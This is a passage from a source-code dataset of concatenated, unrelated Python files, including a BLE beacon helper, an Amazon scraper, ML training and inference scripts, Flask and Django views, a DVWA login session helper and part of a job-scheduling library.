pa_level_at_1_meter(self, value):\n self._type = self._type[:-1] + struct.pack(\">b\", int(value))\n\n @property\n def uuid(self):\n return self._type[:2]\n\n @ServiceData.data.setter\n def data(self, value):\n value = value.replace(\"http://www.\", \"\\x00\")\n value = value.replace(\"https://www.\", \"\\x01\")\n value = value.replace(\"http://\", \"\\x02\")\n value = value.replace(\"https://\", \"\\x03\")\n value = value.replace(\".com/\", \"\\x00\")\n value = value.replace(\".org/\", \"\\x01\")\n value = value.replace(\".edu/\", \"\\x02\")\n value = value.replace(\".net/\", \"\\x03\")\n value = value.replace(\".info/\", \"\\x04\")\n value = value.replace(\".biz/\", \"\\x05\")\n value = value.replace(\".gov/\", \"\\x06\")\n value = value.replace(\".com\", \"\\x07\")\n value = value.replace(\".org\", \"\\x08\")\n value = value.replace(\".edu\", \"\\x09\")\n value = value.replace(\".net\", \"\\x0A\")\n value = value.replace(\".info\", \"\\x0B\")\n value = value.replace(\".biz\", \"\\x0C\")\n self._data = value.replace(\".gov\", \"\\x0D\").encode(\"utf-8\")\n","sub_path":"circuitpython_nrf24l01/fake_ble.py","file_name":"fake_ble.py","file_ext":"py","file_size_in_byte":15693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"551644661","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.service import Service\nfrom bs4 import BeautifulSoup\nimport time\nimport csv\n\nchrome_path = '/usr/bin/chromium-browser'\nchromedriver_path = '/usr/lib/chromium/chromedriver'\no = Options()\no.binary_location = '/usr/bin/chromium-browser'\no.add_argument('--headless')\no.add_argument('--disable-gpu')\no.add_argument('--no-sandbox')\no.add_argument('--window-size=1200x600')\n\n\"\"\"\nSample test\n\"\"\"\nd = webdriver.Chrome(chromedriver_path, options=o)\n\nurl ='https://www.amazon.co.jp/s?i=stripbooks&bbn=2278488051&rh=n%3A465392%2Cn%3A465610%2Cn%3A466280%2Cn%3A2278488051%2Cp_6%3AAN1VRQENFRJN5%2Cp_n_publication_date%3A2285539051&dc&qid=1590279932&rnid=82836051&ref=sr_nr_p_n_publication_date_3'\n\nd.get(url)\n\nhtml = d.page_source\n\nsoup = BeautifulSoup(html,\"html.parser\")\n\nf = open(\"output.csv\",\"w\")\ndate_f = open(\"output_date.csv\",\"w\")\nlink_f = open(\"output_link.csv\",\"w\")\n\n\ntitle_list = []\ndate_list =[]\nlink_list =[]\n\nwhile True:\n print(\"######################now-page:{0} ########################\".format(d.current_url))\n print(\"Starting to get posts...\")\n bk_title = [i.get_text() for i in soup.select(\"[class='a-size-medium a-color-base a-text-normal']\")]\n date = [i.get_text() for i in soup.select(\"[class='a-size-base a-color-secondary a-text-normal']\")]\n link = [tag.get('href') for tag in soup.select(\"[class='a-link-normal a-text-normal']\")]\n\n\n print(len(bk_title))\n print(len(date))\n print(len(link))\n\n\n\n for i in range(len(bk_title)):\n title_list.append([bk_title[i]])\n date_list.append([date[i].strip()])\n link_list.append(['https://www.amazon.co.jp'+link[i]])\n\n # page_num+=1\n # btn = soup.find('.a-last')\n if len( soup.select(\"[class='a-last']\"))<0:\n print(\"no pager exist anymore\")\n break\n next_url = [tag.get('href') for tag in soup.select(\"[class='a-last'] a\")]\n print(\"next url{0}\".format(next_url))\n d.get(next_url)\n d.implicitly_wait(10)\n print(\"Moving to next page\")\n time.sleep(10)\n\nwritecsv = csv.writer(f,lineterminator='\\n')\nwrite_date_csv = csv.writer(date_f,lineterminator='\\n')\nwrite_link_csv = csv.writer(link_f,lineterminator='\\n')\n\nwritecsv.writerows(title_list)\nwrite_date_csv.writerows(date_list)\nwrite_link_csv.writerows(link_list)\nf.close()\nd.quit()\n","sub_path":"app/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"323185585","text":"import config\r\nfrom train.constrastive.Ttrain import Ttrain, Ttest\r\nfrom train.constrastive.Vtrain import Vtrain, Vtest\r\nfrom train.constrastive.Atrain import Atest, Atrain\r\n\r\n\r\nif __name__ == '__main__':\r\n # follow below performance\r\n load_metric = config.SIMS.downStream.load_metric\r\n check_list = config.SIMS.downStream.check_list\r\n metric = config.SIMS.downStream.metric\r\n # select which model to save\r\n check = config.SIMS.downStream.check\r\n result_path = config.SIMS.path.result_path\r\n seed = config.seed\r\n\r\n print('text pretrain')\r\n Ttrain(check={'MAE':10000}, config=config)\r\n Ttest(check_list=['MAE'], config=config)\r\n\r\n print('vision pretrain')\r\n Vtrain(check={'MAE':10000}, config=config)\r\n Vtest(check_list=['MAE'], config=config)\r\n\r\n print('audio pretrain')\r\n Atrain(check={'MAE':10000}, config=config)\r\n Atest(check_list=['MAE'], config=config)\r\n","sub_path":"SIMS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"250350285","text":"from collections import defaultdict\nfrom typing import Dict, List, Set\n\n\ndef get_cc(n, edges: Dict[int, Set[int]]) -> List[List[int]]:\n \"\"\"\n :param n: number of vertices\n :param edges: mapping from vertex to set of neighboring vertices\n :return: list of cut edges\n \"\"\"\n visit_time = [None] * n\n output = []\n curr_index = 0\n\n def dfs(u: int, parent=None) -> int:\n \"\"\"\n :param u: unvisited vertex\n :param parent: parent of \"u\" vertex\n :return: in case u is part of a cycle, it is time = time of that ancestor\n through which DFS enters the cycle. Else it is time at which DFS visits\n the vertex \"u\"\n \"\"\"\n nonlocal curr_index\n visited_time_of_u = curr_index\n curr_index += 1\n\n visit_time[u] = visited_time_of_u\n\n for v in edges[u]:\n if v != parent:\n if visit_time[v] is None:\n t = dfs(v, parent=u)\n\n if visited_time_of_u < t: # no loop possible\n output.append([u, v])\n\n visit_time[u] = min(visit_time[u], visit_time[v])\n\n return visit_time[u]\n\n for i in range(n):\n if visit_time[i] is None: # unvisited vertex\n dfs(i)\n\n return output\n\n\nclass Solution:\n def criticalConnections(self, n: int, connections: List[List[int]]) -> List[List[int]]:\n \"\"\"\n listing all the cut-edges of graph.\n\n An edge is a cut-edge <=> it belongs to no-cycle\n\n :param n: number of vertices\n :param connections: list of edge (edge = list of size two representing end vertices)\n :return: list of cut edges\n \"\"\"\n\n edges = defaultdict(set)\n\n for u, v in connections:\n edges[u].add(v)\n edges[v].add(u)\n\n return get_cc(n, edges)\n","sub_path":"leetcodeOthers/problem1192.py","file_name":"problem1192.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"569131693","text":"import os\nimport argparse\nfrom numpy.core.defchararray import count\nimport requests\nimport torch\nimport torch.nn as nn\nfrom torchvision import transforms\nimport videotransforms\nimport numpy as np\nimport torch.nn.functional as F\nfrom pytorch_i3d import InceptionI3d\nfrom datasets.nslt_dataset_all import NSLT as Dataset, get_num_class\nfrom cv2 import cv2\n\nclass Predictor:\n def __init__(self):\n myfile = open(r'preprocess/wlasl_class_list.txt', 'r')\n self.image_path = 'new_pred.MP4'\n i = 0\n self.dict_of_labels = {}\n for line in myfile.readlines():\n i+=1\n values = line.split('\\t')\n self.dict_of_labels[values[0]] = values[1][:-1]\n\n num_class = 2000\n self.i3d = InceptionI3d(400, in_channels=3)\n self.i3d.load_state_dict(torch.load('weights/rgb_imagenet.pt', map_location=torch.device('cpu')))\n self.i3d.replace_logits(num_class)\n self.i3d.load_state_dict(torch.load(r\"archived/asl2000/FINAL_nslt_2000_iters=5104_top1=32.48_top5=57.31_top10=66.31.pt\", map_location=torch.device('cpu')))\n self.i3d.eval()\n\n def download_from_firebase(self, url):\n i=0\n r = requests.get(url, stream=True)\n if r.status_code==200:\n with open(self.image_path, 'wb') as f:\n for chunk in r:\n f.write(chunk)\n return self.image_path\n\n def load_rgb_frames_from_video(self, video_path, start=0, num=-1):\n vidcap = cv2.VideoCapture(video_path)\n\n frames = []\n\n vidcap.set(cv2.CAP_PROP_POS_FRAMES, start)\n if num == -1:\n num = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n for offset in range(num):\n success, img = vidcap.read()\n\n w, h, c = img.shape\n sc = 224 / w\n img = cv2.resize(img, dsize=(0, 0), fx=sc, fy=sc)\n\n img = (img / 255.) * 2 - 1\n\n frames.append(img)\n \n ans = np.asarray(frames, dtype=np.float32)\n ans=torch.Tensor(ans)\n input_list = [ans]\n transforms_test = transforms.Compose([videotransforms.CenterCrop(224)])\n transpose_t = transforms_test(ans)\n transpose_t_input = transpose_t.permute(3,0,1,2)\n input_for_torch_model = transpose_t_input[None, :, :] \n return input_for_torch_model\n\n def get_best_class_for_video(self, input_tensor):\n logits = self.i3d(input_tensor)\n predictions = torch.max(logits, dim=2)[0]\n out_labels = np.argsort(predictions.cpu().detach().numpy()[0])\n out_probs = np.sort(predictions.cpu().detach().numpy()[0])\n top_5_labels = out_labels[-5:]\n top_5_probs = out_probs[-5:]\n best_match = torch.argmax(predictions[0]).item()\n best_label = self.dict_of_labels[str(best_match)]\n\n return best_label, [(self.dict_of_labels[str(top_5_labels[-i])], top_5_probs[-i]) for i in range(1,6)]\n\n def get_final_labels_in_video(self, url):\n dict_top_5_levels = {}\n final_labels =[]\n \n video_path = self.download_from_firebase(url)\n input_tensors_list = self.load_rgb_frames_from_video(video_path, start=0, num=-1)\n prev_label, prev_5_prev_label = self.get_best_class_for_video(input_tensors_list)\n dict_top_5_levels[prev_label] = prev_5_prev_label\n \n final_labels.append(prev_label)\n os.remove(self.image_path)\n ans_dict = {}\n for (k, v) in dict_top_5_levels.items():\n for i in v:\n ans_dict[i[0]] = f'{i[1]:.2f}'\n return ans_dict\n\nif __name__ == '__main__':\n pred = Predictor()\n top_5_pred = pred.get_final_labels_in_video(\n \"https://firebasestorage.googleapis.com/v0/b/barfi-5faf3.appspot.com/o/a%20lot.mp4?alt=media&token=44161bcb-49be-463f-a98a-eb9a99b842e9\")\n print(top_5_pred)\n","sub_path":"get_pred_on_single_video.py","file_name":"get_pred_on_single_video.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"193511598","text":"def residuals(s, C, ay, Methods, Reg_L1, Reg_L2, Reg_C, Reg_S, Bounds, Nz, LCurve = False):\n\n from laplace import laplace\n #from matplotlib.cm import jet\n import matplotlib.pyplot as plt\n import numpy as np\n from scipy.signal import savgol_filter\n\n import sys\n\n def progressbar(i, iterations):\n i = i + 1\n sys.stdout.write('\\r')\n # the exact output you're looking for:\n sys.stdout.write(\"[%-20s] %d%% Building L-curve\" % ('#'*np.ceil(i*100/iterations*0.2).astype('int'), np.ceil(i*100/iterations)))\n sys.stdout.flush()\n\n def curvature(x, y, a):\n '''Returns curvature of line\n\n k = (x'*y''-x''*y')/((x')^2+(y')^2)^(3/2)\n\n '''\n x = savgol_filter(x, 13, 1)\n y = savgol_filter(y, 13, 1)\n da = np.gradient(a)\n f_x = np.gradient(x)/da\n f_y = np.gradient(y)/da\n f_xx = np.gradient(f_x)/da\n f_yy = np.gradient(f_y)/da\n\n k = (f_x*f_yy - f_xx*f_y)/(f_x**2 + f_y**2)**(3/2)\n return savgol_filter(k, 5, 1)\n #return k\n\n res = []\n sol = []\n\n alpha_L2 = 10**np.linspace(np.log10(Reg_L2) - 3, np.log10(Reg_L2) + 3, 40)\n alpha_C = 10**np.linspace(np.log10(Reg_C) - 3, np.log10(Reg_C) + 3, 40)\n alpha_S = 10**np.linspace(np.log10(Reg_S) - 3, np.log10(Reg_S) + 3, 40)\n if LCurve:\n alpha_C = 10**np.linspace(np.log10(Reg_C) - 3, np.log10(Reg_C) + 3, 40)\n alpha = alpha_C\n\n data = []\n\n Cx = C\n\n for i in Methods:\n\n if len(Methods) > 1:\n print('!!!Choose only one Method!!!')\n break\n\n if i == 'L1':\n break\n\n elif i == 'L2':\n for j, v in enumerate(alpha_L2):\n data = laplace(s, C, Nz, Reg_L1, v, Reg_C, Reg_S, Bounds, Methods)\n e, f, C_restored = data[0][0], data[0][1], data[0][2]\n\n res.append(np.linalg.norm(np.abs(Cx) - np.abs(C_restored), ord = 2)**2)\n sol.append(np.linalg.norm(f, ord = 2)**2)\n progressbar(j, len(alpha_L2))\n alpha = alpha_L2\n break\n\n elif i == 'L1+L2':\n break\n\n elif i == 'Contin':\n for j, v in enumerate(alpha_C):\n data = laplace(s, C, Nz, Reg_L1, Reg_L2, v, Reg_S, Bounds, Methods)\n e, f, C_restored = data[0][0], data[0][1], data[0][2]\n\n res.append(np.linalg.norm(np.abs(Cx) - np.abs(C_restored), ord = 2)**2)\n #sol.append(np.linalg.norm(f, ord = 2)**2)\n sol.append(np.linalg.norm(f*e, ord = 2)**2)\n progressbar(j, len(alpha_C))\n alpha = alpha_C\n break\n\n elif i == 'reSpect':\n for j, v in enumerate(alpha_S):\n data = laplace(s, C, Nz, Reg_L1, Reg_L2, Reg_C, v, Bounds, Methods)\n e, f, C_restored = data[0][0], data[0][1], data[0][2]\n\n res.append(np.linalg.norm(np.abs(Cx - Cx[-1]) - np.abs(C_restored - C_restored[-1]), ord = 2)**2)\n sol.append(np.linalg.norm(f, ord = 2)**2)\n progressbar(j, len(alpha_S))\n alpha = alpha_S\n break\n\n\n\n if len(data) == 0:\n ay.annotate(text = 'Choose only one method \\n Contin, reSpect or L2', xy = (0.5,0.5), ha=\"center\", size = 16)\n plt.tight_layout()\n elif LCurve:\n k = curvature(np.log10(res), np.log10(sol), alpha)\n k_max = np.amax(k)\n if Methods[0] == 'reSpect':\n i = np.where(k == np.amax(k[1:-1]))\n else:\n i = np.where(k == np.amax(k[1:-1]))\n i = np.squeeze(i)\n return alpha[i]\n else:\n k = curvature(np.log10(res), np.log10(sol), alpha)\n k_max = np.amax(k)\n i = np.where(k == np.amax(k))\n if Methods[0] != 'reSpect':\n i = np.where(k == np.amax(k[1:-1]))\n i = np.squeeze(i)\n\n ay.plot(np.log10(res), np.log10(sol), 'k-', )\n ay.plot(np.log10(res[i]), np.log10(sol[i]), 'r*') #highlight optimal lambda\n ay.set_ylabel(r'Solution norm $\\lg||x||^2_2$', c='k')\n ay.set_xlabel(r'Residual norm $\\lg||\\eta-Cx||^2_2$', c='k')\n\n ay_k = ay.twinx()\n ay_k_t = ay_k.twiny()\n ay_k_t.set_xscale('log')\n ay_k_t.plot(alpha, k/k[i], 'r-')\n ay_k_t.plot(alpha[i], k[i]/k[i], 'r*')\n ay_k.set_ylabel(r'Curvature, arb. units', c='r')\n ay_k.set_ylim(-0.1, 1.1)\n #ay_k.set_yscale('log')\n #ay_k.set_ylim(1e-3, 2.0)\n ay_k_t.set_xlabel(r'Reg. parameter $\\lambda_{%.s}$'%(Methods[0]), c='r')\n\n ay_k_t.spines['top'].set_color('red')\n ay_k_t.spines['right'].set_color('red')\n ay_k_t.xaxis.label.set_color('red')\n ay_k_t.tick_params(axis='x', colors='red', which='both')\n ay_k.yaxis.label.set_color('red')\n ay_k.tick_params(axis='y', colors='red', which='both')\n plt.tight_layout()\n","sub_path":"functions/residuals.py","file_name":"residuals.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"57484872","text":"from flask import Flask, render_template\n\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\nport = 5000\nhost = '0.0.0.0'\n\n\n@app.route('/')\ndef homepage():\n return render_template('index.html')\n\nif __name__ == \"__main__\":\n app.run(host=host, port=port)\n","sub_path":"mock_fe/mock_fe.py","file_name":"mock_fe.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"372984073","text":"# -*- coding: utf-8 -*-\n\nKEY_NM_EVT = \"evt\"\nKEY_NM_MSG = \"msg\"\nKEY_NM_DATE = \"date\"\nKEY_NM_DATA = \"data\"\n\nEVT_TYPE_FIN = 0\nEVT_TYPE_ERR = 1\nEVT_TYPE_GET_KP200_FUT = 2\n\nHOST = \"127.0.0.1\"\nPORT = 8765\n","sub_path":"Study And Project/DAT-I LAB Study and Project/creon dat/global_def.py","file_name":"global_def.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"41168086","text":"suma_total = float(0)\nbandera = True\nprint(\"Ingrese las notas de los estudiantes de su materia\")\nwhile (bandera):\n calificacion = float(input(\"Ingrese calificacion: \"))\n suma_total = suma_total + calificacion\n temporal = input(\"Ingrese 'Si' para salir del ciclo: \")\n if temporal == \"Si\":\n bandera = False\nprint(\"Suma de calificaiones es %.2f\\n\"%(suma_total))","sub_path":"semana 6/ejercicios-clase-06-1bim-JamilErasmo/ejemplos-while/Ejemplo08.py","file_name":"Ejemplo08.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"443681606","text":"from flask import render_template, flash, redirect\nfrom app import app\nfrom .forms import PostForm\n\n@app.route('/')\n@app.route('/index')\ndef index():\n form = PostForm()\n if form.validate_on_submit():\n post = Post(body=form.post.data)\n return render_template('index.html',\n title='Home',\n form=form)\n","sub_path":"math_app/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"647853000","text":"from django import template\n\nfrom contents.models import ContentBlock\n\n\nregister = template.Library()\n\n@register.simple_tag\ndef content_block(name):\n\n try:\n content_block = ContentBlock.objects.get(name=name)\n except ContentBlock.DoesNotExist:\n return \"\"\n\n return content_block.content.rendered\n\nregister.simple_tag(content_block)","sub_path":"web/contents/templatetags/content_block.py","file_name":"content_block.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"262133661","text":"from flask import request\n\nfrom core.resource_core import BaseResource\nfrom schemas.user import User as SchemaUser\nfrom schemas.user import UserLevel as SchemaUserLevel\nfrom schemas.user import UserStatus as SchemaUserStatus\n\nclass User(BaseResource):\n\theader = {'Allow' : 'GET, POST, PUT, PATCH, PARTIAL_DELETE, DELETE'}\n\n\tdef user_r(self):\n\t\tif request.method == 'GET':\n\t\t\tresponse, code = SchemaUser.get()\n\t\t\t\n\t\telif request.method == 'POST':\n\t\t\tuser = SchemaUser()\n\t\t\targs = dict(request.args.copy())\n\t\t\targs['user_status_id'] = 1\n\t\t\targs['user_level_id'] = 2\n\t\t\tresponse, code = user.post(args)\n\n\t\telif request.method == 'PUT':\n\t\t\tuser = SchemaUser()\n\t\t\tresponse, code = user.put()\n\n\t\telif request.method == 'PATCH':\n\t\t\tuser = SchemaUser()\n\t\t\tresponse, code = user.patch()\n\n\t\telif request.method == 'PARTIAL_DELETE':\n\t\t\tuser = SchemaUser()\n\t\t\tresponse, code = user.partial_delete('user_status_id')\n\n\t\telif request.method == 'DELETE':\n\t\t\tuser = SchemaUser()\n\t\t\tresponse, code = user.delete()\n\n\t\treturn self.make_response(response, code, self.header)\n\n\tuser_r.methods = ['GET', 'POST', 'PUT', 'PATCH', 'PARTIAL_DELETE', 'DELETE']\n\nclass UsersLevel(BaseResource):\n\tdef user_level_r(self):\n\t\theader = {'Allow' : 'GET, POST, PUT, PATCH'}\n\n\t\tif request.method == 'GET':\n\t\t\tresponse, code = SchemaUserLevel.get()\n\n\t\telif request.method == 'POST':\n\t\t\tuser = SchemaUserLevel()\n\t\t\tresponse, code = user.post()\n\n\t\telif request.method == 'PUT':\n\t\t\tuser = SchemaUserLevel()\n\t\t\tresponse, code = user.put()\n\n\t\telif request.method == 'PATCH':\n\t\t\tuser = SchemaUserLevel()\n\t\t\tresponse, code = user.patch()\n\n\t\treturn self.make_response(response, code, header)\n\n\tuser_level_r.methods = ['GET', 'POST', 'PUT', 'PATCH']\n\nclass UsersStatus(BaseResource):\n\tdef user_status_r(self):\n\t\theader = {'Allow' : 'GET, POST, PUT, PATCH'}\n\n\t\tif request.method == 'GET':\n\t\t\tresponse, code = SchemaUserStatus.get()\n\n\t\telif request.method == 'POST':\n\t\t\tuser = SchemaUserStatus()\n\t\t\tresponse, code = user.post()\n\n\t\telif request.method == 'PUT':\n\t\t\tuser = SchemaUserStatus()\n\t\t\tresponse, code = user.put()\n\n\t\telif request.method == 'PATCH':\n\t\t\tuser = SchemaUserStatus()\n\t\t\tresponse, code = user.patch()\n\n\t\treturn self.make_response(response, code, header)\n\n\tuser_status_r.methods = ['GET', 'POST', 'PUT', 'PATCH']","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"504923355","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom mkbroapp.views import index, devpage, about, contacts\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'mkbroproject.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', index),\n url(r'^devpage$', devpage),\n url(r'^about$', about),\n url(r'^contacts$', contacts),\n]\n","sub_path":"django/mkbroproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"565626515","text":"from bs4 import BeautifulSoup\nfrom requests.compat import urljoin\nimport sys, requests\n\nclass Session:\n def __init__(self, base_url):\n self.__session = requests\n self.__base_url = base_url\n self.__csrf = None\n self.__cookies = {\n 'PHPSESSID': None,\n 'security': None\n }\n\n def get_session(self):\n return self.__session\n\n def get_base_url(self):\n return self.__base_url\n\n def get_csrf(self):\n return self.__csrf\n\n def get_cookies(self):\n return self.__cookies\n\n def get_sess_infos(self, rel_url, cookie=None):\n if cookie is None:\n cookie = self.__cookies\n # Prepare the GET request\n req_url = urljoin(self.__base_url, rel_url) # http:///\n\n #Fetch CSRF token & cookies\n try:\n # Send the GET request\n r = self.__session.get(req_url, cookies=cookie)\n # Fetch CSRF token using CSS selector (google chrome: inspect element)\n self.__csrf = BeautifulSoup(r.text, 'html.parser').find(\"input\", attrs={\"name\":\"user_token\"})[\"value\"]\n # Fetch cookies (PHPSESSID & Security Level)\n self.__cookies.update(r.cookies.get_dict())\n return self.__csrf, self.__cookies\n except:\n print('Could not connect to DVWA server. Are you sure it is the right URL?')\n sys.exit(-1)\n\n # Log in + fetch CSRF token & cookies\n def login(self, rel_url, login_user, login_pass):\n # GET request to fetch CSRF token and cookies\n self.get_sess_infos(rel_url)\n\n data = {\n 'username': login_user,\n 'password': login_pass,\n 'Login': 'Login',\n 'user_token': self.__csrf\n }\n\n # Login attempt\n try:\n login_url = urljoin(self.__base_url, rel_url)\n r = self.__session.post(url=login_url, data=data, cookies=self.__cookies)\n except:\n print('Login attempt has failed.')\n sys.exit(-1)\n\n if r.status_code is not 200:\n print('DVWA server did not return expected status code. CODE: %d', r.status_code)\n sys.exit(-1)\n\n return r.text\n","sub_path":"core/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"418692029","text":"\"\"\"\nPython job scheduling for humans.\n\nAn in-process scheduler for periodic jobs that uses the builder pattern\nfor configuration. Schedule lets you run Python functions (or any other\ncallable) periodically at pre-determined intervals using a simple,\nhuman-friendly syntax.\n\nInspired by Addam Wiggins' article \"Rethinking Cron\" [1] and the\n\"clockwork\" Ruby module [2][3].\n\nFeatures:\n - A simple to use API for scheduling jobs.\n - Very lightweight and no external dependencies.\n - Excellent test coverage.\n - Works with Python 2.7 and 3.3\n\nUsage:\n >>> import schedule\n >>> import time\n\n >>> def job(message='stuff'):\n >>> print(\"I'm working on:\", message)\n\n >>> schedule.every(10).minutes.do(job)\n >>> schedule.every().hour.do(job, message='things')\n >>> schedule.every().day.at(\"10:30\").do(job)\n\n >>> while True:\n >>> schedule.run_pending()\n >>> time.sleep(1)\n\n[1] http://adam.heroku.com/past/2010/4/13/rethinking_cron/\n[2] https://github.com/tomykaira/clockwork\n[3] http://adam.heroku.com/past/2010/6/30/replace_cron_with_clockwork/\n\"\"\"\nimport datetime\nimport functools\nimport logging\nimport random\nimport time\nfrom dateutil import parser\nfrom dateutil.tz import tzlocal\n\nfrom .tz import tz_offsets\n\nlogger = logging.getLogger('schedule')\n\n\nclass Scheduler(object):\n def __init__(self):\n self.jobs = []\n\n def run_pending(self):\n \"\"\"Run all jobs that are scheduled to run.\n\n Please note that it is *intended behavior that tick() does not\n run missed jobs*. For example, if you've registered a job that\n should run every minute and you only call tick() in one hour\n increments then your job won't be run 60 times in between but\n only once.\n \"\"\"\n runnable_jobs = (job for job in self.jobs if job.should_run)\n for job in sorted(runnable_jobs):\n job.run()\n\n def run_all(self, delay_seconds=0):\n \"\"\"Run all jobs regardless if they are scheduled to run or not.\n\n A delay of `delay` seconds is added between each job. This helps\n distribute system load generated by the jobs more evenly\n over time.\"\"\"\n logger.info('Running *all* %i jobs with %is delay inbetween',\n len(self.jobs), delay_seconds)\n for job in self.jobs:\n job.run()\n time.sleep(delay_seconds)\n\n def clear(self):\n \"\"\"Deletes all scheduled jobs.\"\"\"\n del self.jobs[:]\n\n def every(self, interval=1):\n \"\"\"Schedule a new periodic job.\"\"\"\n job = Job(interval)\n self.jobs.append(job)\n return job\n\n def on(self, *days):\n \"\"\"Schedule a new job to run on specific weekdays.\n\n See the docstring for `Job.on()`.\n \"\"\"\n job = self.every()\n job.unit = 'days'\n return job.on(*days)\n\n @property\n def next_run(self):\n \"\"\"Datetime when the next job should run.\"\"\"\n if not self.jobs:\n return None\n return min(self.jobs).next_run\n\n @property\n def idle_seconds(self):\n \"\"\"Number of seconds until `next_run`.\"\"\"\n return (self.next_run - datetime.datetime.now(tzlocal())\n ).total_seconds()\n\n\nclass Job(object):\n \"\"\"A periodic job as used by `Scheduler`.\"\"\"\n WEEKDAYS = {'sunday': 0, 'monday': 1, 'tuesday': 2, 'wednesday': 3,\n 'thursday': 4, 'friday': 5, 'saturday': 6}\n\n def __init__(self, interval):\n self.interval = interval # pause interval * unit between runs\n self.job_func = None # the job job_func to run\n self.unit = None # time units, e.g. 'minutes', 'hours', ...\n self.at_time = None # optional time at which this job runs\n self.between_times = ()\n self.run_days = []\n self.start_run = None # datetime after which this job will start\n self.last_run = None # datetime of the last run\n self.next_run = None # datetime of the next run\n self.period = None # timedelta between runs, only valid for\n\n def __lt__(self, other):\n \"\"\"PeriodicJobs are sortable based on the scheduled time\n they run next.\"\"\"\n return self.next_run < other.next_run\n\n def __repr__(self):\n fmt_dt = \"%Y-%m-%d %H:%M:%S %Z\"\n fmt_t = \"%H:%M:%S %Z\"\n\n def format_time(t):\n return t.strftime(fmt_dt) if t else '[never]'\n\n timestats = '(last run: %s, next run: %s)' % (\n format_time(self.last_run), format_time(self.next_run))\n\n job_func_name = self.job_func.__name__\n args = [repr(x) for x in self.job_func.args]\n kwargs = ['%s=%s' % (k, repr(v))\n for k, v in self.job_func.keywords.items()]\n call_repr = job_func_name + '(' + ', '.join(args + kwargs) + ')'\n\n if self.run_days:\n final_days = []\n for day in self.run_days:\n days_str = [k.title() for k, i in Job.WEEKDAYS.items()\n for d in day if i == d]\n final_days.append(' or '.join(days_str))\n repr_str = 'Every %s' % ' and '.join(final_days)\n else:\n repr_str = 'Every %s %s' % (\n self.interval,\n self.unit[:-1] if self.interval == 1 else self.unit)\n\n if self.between_times:\n repr_str += ' between %s' % ' and '.join(\n t.strftime(fmt_t).strip()\n for t in self.between_times)\n elif self.at_time:\n repr_str += ' at %s' % self.at_time.strftime(fmt_t).strip()\n if self.start_run:\n repr_str += ' starting %s' % self.start_run.strftime(fmt_dt)\n repr_str += ' do %s %s' % (call_repr, timestats)\n return repr_str\n\n @property\n def second(self):\n assert self.interval == 1\n return self.seconds\n\n @property\n def seconds(self):\n self.unit = 'seconds'\n return self\n\n @property\n def minute(self):\n assert self.interval == 1\n return self.minutes\n\n @property\n def minutes(self):\n self.unit = 'minutes'\n return self\n\n @property\n def hour(self):\n assert self.interval == 1\n return self.hours\n\n @property\n def hours(self):\n self.unit = 'hours'\n return self\n\n @property\n def day(self):\n assert self.interval == 1\n return self.days\n\n @property\n def days(self):\n self.unit = 'days'\n return self\n\n @property\n def week(self):\n assert self.interval == 1\n return self.weeks\n\n @property\n def weeks(self):\n self.unit = 'weeks'\n return self\n\n def on(self, *days):\n \"\"\"Schedule the job to run on specific weekdays.\n\n `days` can be a string (or sequence of strings) with the name of the\n weekday (case insensitive), e.g. 'Monday', 'sunday', etc, or a starting\n substring of the name of the weekday, e.g. 'tue', 'Sat', etc.\n\n If you specify multiple days, e.g. ('mon', 'wed'), the job will run\n every Monday and Wednesday.\n\n You can also specify OR conditions by separating the day names with a\n pipe, e.g. ('sun|mon', 'wed|thu'). In this case the job will run\n every Sunday *or* Monday, and every Wednesday *or* Thursday.\n \"\"\"\n weeknums = []\n for day in days:\n day_or = set()\n for d in day.split('|'):\n for n, i in Job.WEEKDAYS.items():\n if n.startswith(d.lower()):\n day_or.add(i)\n if day_or:\n weeknums.append(day_or)\n\n self.run_days = weeknums\n return self\n\n def at(self, time_str):\n \"\"\"Schedule the job every day at a specific time.\n\n Calling this is only valid for jobs scheduled to run every\n N day(s).\n \"\"\"\n assert self.unit == 'days'\n self.at_time = parser.parse(time_str, tzinfos=tz_offsets)\n if not self.at_time.tzinfo:\n self.at_time = 